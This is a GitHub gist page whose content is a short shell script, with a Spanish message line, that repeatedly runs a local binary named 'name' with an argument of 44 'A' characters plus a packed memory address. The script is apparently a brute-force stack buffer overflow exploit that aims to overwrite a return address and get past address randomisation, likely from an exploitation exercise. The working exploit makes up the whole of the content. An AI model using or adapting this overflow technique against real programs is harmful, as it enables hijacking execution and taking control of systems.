Skip to content

Instantly share code, notes, and snippets.

@RdlP
Created October 21, 2016 14:08
Show Gist options
  • Select an option

  • Save RdlP/8d57f97022e74d97dd5083501275de8a to your computer and use it in GitHub Desktop.

Select an option

Save RdlP/8d57f97022e74d97dd5083501275de8a to your computer and use it in GitHub Desktop.
#!/bin/sh
for i in `seq 1 200`;
do
echo "Número de intentos: $i"
./name `python -c "print 'A'*44 + '\xbc\x6c\xb5\xff'"`
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment